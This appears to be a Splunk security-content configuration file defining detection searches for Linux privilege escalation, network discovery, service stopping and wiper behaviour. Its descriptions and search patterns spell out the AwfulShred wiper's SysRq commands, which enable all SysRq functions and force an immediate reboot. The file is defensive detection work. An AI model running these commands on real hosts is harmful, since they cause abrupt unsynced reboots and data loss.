action.escu.known_false_positives = Administrators or network operators may use these commands for automation purposes. Please update the filter macros to remove false positives. action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Stop Services - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["AwfulShred", "Data Destruction", "Industroyer2"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified attempting to stop services on endpoint $dest$ by $user$. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Stop Services - Rule action.correlationsearch.annotations = {"analytic_story": ["AwfulShred", "Data Destruction", "Industroyer2"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1489"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects events that attempt to stop or clear a service. This is typically identified in parallel with other instances of service enumeration, or attempts to stop a service and then delete it. 
Adversaries such as the Industroyer2 malware use this technique to terminate security services or other related services so that their destructive payload can continue toward its objective. action.notable.param.rule_title = Linux Stop Services action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name IN ("systemctl", "service", "svcadm") Processes.process ="*stop*" by Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_stop_services_filter` [ESCU - Linux Sudo OR Su Execution - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic detects the execution of the sudo or su command on Linux operating systems. The "sudo" command allows a system administrator to delegate authority, giving certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments. Both commands are commonly abused by adversaries, malware authors and red teamers to elevate privileges on the targeted host. They are also executed by administrators for legitimate purposes or to run processes that need admin privileges, so filtering is needed. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic detects the execution of the sudo or su command on Linux operating systems. The "sudo" command allows a system administrator to delegate authority, giving certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments. Both commands are commonly abused by adversaries, malware authors and red teamers to elevate privileges on the targeted host. They are also executed by administrators for legitimate purposes or to run processes that need admin privileges, so filtering is needed. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or network operators can execute these commands. Please update the filter macros to remove false positives. 
action.escu.creation_date = 2022-01-04 action.escu.modification_date = 2022-01-04 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Sudo OR Su Execution - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Sudo OR Su Execution - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques"], "cis20": ["CIS 10"], "confidence": 30, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name IN ("sudo", "su") OR Processes.parent_process_name IN ("sudo", "su") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_sudo_or_su_execution_filter` [ESCU - Linux Sudoers Tmp File Creation - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the creation of a sudoers.tmp file, which is caused by editing /etc/sudoers with visudo or 
an editor on the Linux platform. This technique may be abused by adversaries, malware authors and red teamers to gain elevated privileges on a targeted or compromised host. The /etc/sudoers file controls who can run which commands as which users on which machines, and can also control special settings such as whether a password is required for particular commands. The file is composed of aliases (basically variables) and user specifications (which control who can run what). action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the creation of a sudoers.tmp file, which is caused by editing /etc/sudoers with visudo or an editor on the Linux platform. This technique may be abused by adversaries, malware authors and red teamers to gain elevated privileges on a targeted or compromised host. The /etc/sudoers file controls who can run which commands as which users on which machines, and can also control special settings such as whether a password is required for particular commands. The file is composed of aliases (basically variables) and user specifications (which control who can run what). action.escu.how_to_implement = To successfully implement this search, you need to be ingesting file creation events from your endpoints, with the file name and file path mapped to the `Filesystem` node of the `Endpoint` data model. If you are using Sysmon, you can use the Add-on for Linux Sysmon from Splunkbase. action.escu.known_false_positives = An administrator or network operator can legitimately edit /etc/sudoers. Please update the filter macros to remove false positives. 
action.escu.creation_date = 2021-12-23 action.escu.modification_date = 2021-12-23 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Sudoers Tmp File Creation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques"] action.risk = 1 action.risk.param._risk_message = A file $file_name$ is created in $file_path$ on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 72}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Sudoers Tmp File Creation - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques"], "cis20": ["CIS 10"], "confidence": 90, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_path IN ("*sudoers.tmp*") by Filesystem.dest Filesystem.file_name Filesystem.process_guid Filesystem.file_path | `drop_dm_object_name(Filesystem)` | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `linux_sudoers_tmp_file_creation_filter` [ESCU - Linux System Network Discovery - Rule] action.escu = 0 
action.escu.enabled = 1 description = This analytic looks for possible enumeration of the local network configuration: four or more distinct network discovery tools (arp, ifconfig, ip, netstat, firewall-cmd, ufw, iptables, ss or route) run on the same host by the same user within a 30-minute window. This technique is commonly used by adversaries or threat actors during reconnaissance to learn network information for their next attack step. This anomaly detection may also capture normal events generated by administrators while auditing or testing network connectivity between hosts or networks. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1016"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for possible enumeration of the local network configuration: four or more distinct network discovery tools (arp, ifconfig, ip, netstat, firewall-cmd, ufw, iptables, ss or route) run on the same host by the same user within a 30-minute window. This technique is commonly used by adversaries or threat actors during reconnaissance to learn network information for their next attack step. This anomaly detection may also capture normal events generated by administrators while auditing or testing network connectivity between hosts or networks. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or network operators can execute these commands. Please update the filter macros to remove false positives. 
action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux System Network Discovery - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Data Destruction", "Network Discovery", "Industroyer2"] action.risk = 1 action.risk.param._risk_message = A commandline $process$ executed on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 9}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux System Network Discovery - Rule action.correlationsearch.annotations = {"analytic_story": ["Data Destruction", "Network Discovery", "Industroyer2"], "cis20": ["CIS 10"], "confidence": 30, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1016"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Processes.process_name) as process_name_list values(Processes.process) as process_list values(Processes.process_id) as process_id_list values(Processes.parent_process_id) as parent_process_id_list values(Processes.process_guid) as process_guid_list dc(Processes.process_name) as process_name_count from datamodel=Endpoint.Processes where Processes.process_name IN ("arp", "ifconfig", "ip", "netstat", "firewall-cmd", "ufw", "iptables", "ss", "route") by _time 
span=30m Processes.dest Processes.user | where process_name_count >=4 | `drop_dm_object_name(Processes)`| `linux_system_network_discovery_filter` [ESCU - Linux System Reboot Via System Request Key - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for possible use of the Linux magic SysRq key to reboot the host. This technique was seen in the AwfulShred wiper malware, which rebooted the compromised host this way. Writing 'b' to /proc/sysrq-trigger (for example, echo b > /proc/sysrq-trigger) reboots the system immediately, without syncing or unmounting filesystems, once the SysRq reboot function has been enabled via /proc/sys/kernel/sysrq (writing '1' enables all functions). This TTP detection can be a good indicator of suspicious processes running on the Linux host, since this is not a common way to reboot a system. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1529"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for possible use of the Linux magic SysRq key to reboot the host. This technique was seen in the AwfulShred wiper malware, which rebooted the compromised host this way. Writing 'b' to /proc/sysrq-trigger (for example, echo b > /proc/sysrq-trigger) reboots the system immediately, without syncing or unmounting filesystems, once the SysRq reboot function has been enabled via /proc/sys/kernel/sysrq (writing '1' enables all functions). This TTP detection can be a good indicator of suspicious processes running on the Linux host, since this is not a common way to reboot a system. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. 
These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = unknown action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux System Reboot Via System Request Key - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["AwfulShred", "Data Destruction"] action.risk = 1 action.risk.param._risk_message = a $process_name$ execute sysrq command $process$ to reboot $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux System Reboot Via System Request Key - Rule action.correlationsearch.annotations = {"analytic_story": ["AwfulShred", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1529"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic is to look for possible execution of SysReq hack to reboot the Linux system host. This technique was seen in Awfulshred malware wiper to reboot the compromised host by using the linux magic sysreq key. 
This kernel configuration can trigger reboot by piping out 'b' to /proc/sysrq-trigger after enabling all the functions of sysrq. This TTP detection can be a good indicator of possible suspicious processes running on the Linux host since this command is not a common way to reboot a system. action.notable.param.rule_title = Linux System Reboot Via System Request Key action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name IN ("dash", "sudo", "bash") Processes.process = "* echo b > *" Processes.process = "*/proc/sysrq-trigger" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `linux_system_reboot_via_system_request_key_filter` [ESCU - Linux Unix Shell Enable All SysRq Functions - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to look for possible execution of SysReq hack to enable all functions of kernel system requests of the Linux system host. This technique was seen in AwfulShred malware wiper to reboot the compromised host by using the linux magic sysreq key. This kernel configuration can be triggered by piping out bitmask '1' to /proc/sys/kernel/sysrq. This TTP detection can be a good indicator of possible suspicious processes running on the Linux host since this command is not so common shell commandline. 
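The following is an added example, not part of the Splunk content above: it runs the three Linux detections in this section (the 30-minute distinct-tool count from Linux System Network Discovery, and the two SysRq command-line pattern pairs from the reboot and enable-all-functions rules) over constructed process events, emulating SPL wildcard matching in Python. The hosts, users and command lines are made up, and case-insensitive matching is an assumption about how Splunk compares the `Processes.process` field.

```python
"""Added example (not Splunk's code): run the Linux detections above over
constructed process events. Field names follow the Endpoint.Processes data
model used by the searches (_time, dest, user, process_name, process)."""
import re
from collections import defaultdict

# Tool list copied from the Linux System Network Discovery search.
NETWORK_DISCOVERY_TOOLS = {"arp", "ifconfig", "ip", "netstat", "firewall-cmd",
                           "ufw", "iptables", "ss", "route"}
# Shells the two SysRq searches restrict process_name to.
SHELLS = {"dash", "sudo", "bash"}
# Wildcard pairs copied from the two SysRq searches; both patterns must match.
SYSRQ_PATTERNS = {
    "Linux Unix Shell Enable All SysRq Functions": ("* echo 1 > *", "*/proc/sys/kernel/sysrq"),
    "Linux System Reboot Via System Request Key": ("* echo b > *", "*/proc/sysrq-trigger"),
}


def spl_glob_match(pattern, value):
    """Emulate an SPL `field = "pattern"` comparison: '*' matches any run of
    characters, everything else is literal, and the whole value must match.
    Case-insensitive comparison is assumed here."""
    regex = ".*".join(re.escape(part) for part in pattern.split("*"))
    return re.fullmatch(regex, value, re.IGNORECASE | re.DOTALL) is not None


def detect_sysrq(events):
    """Return (rule name, event) pairs for shell command lines that match one
    of the SysRq pattern pairs."""
    hits = []
    for ev in events:
        if ev["process_name"] not in SHELLS:
            continue
        for rule, patterns in SYSRQ_PATTERNS.items():
            if all(spl_glob_match(p, ev["process"]) for p in patterns):
                hits.append((rule, ev))
    return hits


def detect_network_discovery(events, span_seconds=30 * 60, threshold=4):
    """Emulate `by _time span=30m dest user | where process_name_count >= 4`:
    bucket events into 30-minute spans, group by (span, dest, user) and flag
    groups in which at least `threshold` distinct discovery tools ran."""
    tools_seen = defaultdict(set)
    for ev in events:
        if ev["process_name"] in NETWORK_DISCOVERY_TOOLS:
            bucket = ev["_time"] - ev["_time"] % span_seconds
            tools_seen[(bucket, ev["dest"], ev["user"])].add(ev["process_name"])
    return {key: sorted(names) for key, names in tools_seen.items()
            if len(names) >= threshold}


def _event(t, dest, user, process_name, process):
    return {"_time": t, "dest": dest, "user": user,
            "process_name": process_name, "process": process}


# Constructed sample telemetry (hypothetical hosts, users and command lines).
# T0 is a multiple of 1800 so the first 30-minute span starts exactly at T0.
T0 = 1_700_001_000
SAMPLE_EVENTS = [
    # web-01/svc runs four distinct discovery tools inside one 30-minute span.
    _event(T0 + 60, "web-01", "svc", "ifconfig", "ifconfig -a"),
    _event(T0 + 120, "web-01", "svc", "ip", "ip route show"),
    _event(T0 + 300, "web-01", "svc", "netstat", "netstat -antp"),
    _event(T0 + 600, "web-01", "svc", "ss", "ss -lntp"),
    # build-02/dev runs two tools in one span and a third in the next: no alert.
    _event(T0 + 60, "build-02", "dev", "ip", "ip addr"),
    _event(T0 + 100, "build-02", "dev", "route", "route -n"),
    _event(T0 + 3000, "build-02", "dev", "ss", "ss -tn"),
    # SysRq: enable all functions, then force a reboot (the AwfulShred sequence).
    _event(T0 + 900, "web-01", "root", "bash", "bash -c echo 1 > /proc/sys/kernel/sysrq"),
    _event(T0 + 905, "web-01", "root", "sudo", "sudo sh -c echo b > /proc/sysrq-trigger"),
    # Same action logged with the quotes preserved: the trailing quote and the
    # missing space before "echo" defeat both wildcard patterns.
    _event(T0 + 910, "web-02", "root", "bash", 'bash -c "echo b > /proc/sysrq-trigger"'),
]
```

The last sample event shows the caveat a practitioner should check first: the SysRq searches require a space before `echo` and the /proc path at the very end of `Processes.process`, so whether an EDR logs the command line with or without shell quoting decides whether the write is caught at all.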
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.004", "T1059"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic looks for possible enabling of all kernel SysRq (magic system request key) functions on a Linux host. The technique was seen in the AwfulShred wiper, which enabled SysRq before using it to reboot the compromised host. Writing the value '1' to /proc/sys/kernel/sysrq enables all SysRq functions. Because this is not a common shell command line, the detection can be a good indicator of suspicious processes running on the Linux host.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = unknown
action.escu.creation_date = 2023-04-14
action.escu.modification_date = 2023-04-14
action.escu.confidence = high
action.escu.full_search_name = ESCU - Linux Unix Shell Enable All SysRq Functions - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["AwfulShred", "Data Destruction"]
action.risk = 1
action.risk.param._risk_message = A $process_name$ process executed the SysRq command $process$ to enable all SysRq functions on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 36}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Linux Unix Shell Enable All SysRq Functions - Rule
action.correlationsearch.annotations = {"analytic_story": ["AwfulShred", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.004", "T1059"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name IN ("dash", "sudo", "bash") Processes.process = "* echo 1 > *" Processes.process = "*/proc/sys/kernel/sysrq" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `linux_unix_shell_enable_all_sysrq_functions_filter`

[ESCU - Linux Visudo Utility Execution - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic looks for execution of the visudo utility, which is used to edit /etc/sudoers on Linux. Adversaries, malware authors and red teamers may abuse it to add entries that grant elevated privileges on a targeted or compromised host. The /etc/sudoers file controls who can run which commands as which users on which machines, and also controls details such as whether a password is required for particular commands. The file is composed of aliases (essentially variables) and user specifications (which control who can run what).
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic looks for execution of the visudo utility, which is used to edit /etc/sudoers on Linux. Adversaries, malware authors and red teamers may abuse it to add entries that grant elevated privileges on a targeted or compromised host. The /etc/sudoers file controls who can run which commands as which users on which machines, and also controls details such as whether a password is required for particular commands. The file is composed of aliases (essentially variables) and user specifications (which control who can run what).
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Administrators or network operators can execute this command. Update the filter macro to remove false positives.
action.escu.creation_date = 2021-12-21
action.escu.modification_date = 2021-12-21
action.escu.confidence = high
action.escu.full_search_name = ESCU - Linux Visudo Utility Execution - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques"]
action.risk = 1
action.risk.param._risk_message = A commandline $process$ executed on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 16}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Linux Visudo Utility Execution - Rule
action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques"], "cis20": ["CIS 10"], "confidence": 40, "impact": 40, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = visudo by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_visudo_utility_execution_filter`

[ESCU - Living Off The Land - Rule]
action.escu = 0
action.escu.enabled = 1
description = This correlation identifies a number of distinct detections from the Living Off The Land analytic story that fired against the same system, which together indicate potentially suspicious behavior.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Command and Control", "Delivery", "Installation"], "mitre_attack": ["T1105", "T1190", "T1059", "T1133"], "nist": ["DE.AE"]}
action.escu.data_models = ["Risk"]
action.escu.eli5 = This correlation identifies a number of distinct detections from the Living Off The Land analytic story that fired against the same system, which together indicate potentially suspicious behavior.
action.escu.how_to_implement = To implement this correlation search, enable all detections in the Living Off The Land analytic story and confirm they are generating risk events. A simple search `index=risk analyticstories="Living Off The Land"` should return events.
action.escu.known_false_positives = There are no known false positives for this search, but it could produce them, as multiple detections can trigger without successful exploitation. To reduce noise, raise the static threshold on source_count (the number of distinct detections per risk object and MITRE tactic group, 5 in this search). The analytics tagged to this story also need tuning so that their volume never becomes excessive.
action.escu.creation_date = 2022-09-09
action.escu.modification_date = 2022-09-09
action.escu.confidence = high
action.escu.full_search_name = ESCU - Living Off The Land - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Living Off The Land"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - RIR - Living Off The Land - Rule
action.correlationsearch.annotations = {"analytic_story": ["Living Off The Land"], "cis20": ["CIS 10"], "confidence": 70, "impact": 90, "kill_chain_phases": ["Command and Control", "Delivery", "Installation"], "mitre_attack": ["T1105", "T1190", "T1059", "T1133"], "nist": ["DE.AE"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This correlation identifies a number of distinct detections from the Living Off The Land analytic story that fired against the same system, which together indicate potentially suspicious behavior.
action.notable.param.rule_title = RBA: Living Off The Land
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` min(_time) as firstTime max(_time) as lastTime sum(All_Risk.calculated_risk_score) as risk_score, count(All_Risk.calculated_risk_score) as risk_event_count, values(All_Risk.annotations.mitre_attack.mitre_tactic_id) as annotations.mitre_attack.mitre_tactic_id, dc(All_Risk.annotations.mitre_attack.mitre_tactic_id) as mitre_tactic_id_count, values(All_Risk.annotations.mitre_attack.mitre_technique_id) as annotations.mitre_attack.mitre_technique_id, dc(All_Risk.annotations.mitre_attack.mitre_technique_id) as mitre_technique_id_count, values(All_Risk.tag) as tag, values(source) as source, dc(source) as source_count from datamodel=Risk.All_Risk where All_Risk.analyticstories="Living Off The Land" All_Risk.risk_object_type="system" by All_Risk.risk_object All_Risk.risk_object_type All_Risk.annotations.mitre_attack.mitre_tactic | `drop_dm_object_name(All_Risk)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | where source_count >= 5 | `living_off_the_land_filter`

[ESCU - Loading Of Dynwrapx Module - Rule]
action.escu = 0
action.escu.enabled = 1
description = DynamicWrapperX is an ActiveX component that lets a script call Windows API functions, but it requires dynwrapx.dll to be installed and registered. Registering or loading dynwrapx.dll on a host is therefore highly suspicious. When it is used maliciously, the best way to triage is usually to review parallel processes and pivot on the process_guid. Review the registry for any suspicious modifications meant to load dynwrapx.dll, and identify any suspicious module loads of dynwrapx.dll. This detection returns the processes, typically wscript.exe or cscript.exe running a VBScript, that loaded dynwrapx.dll.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055", "T1055.001"], "nist": ["DE.CM"]}
action.escu.data_models = []
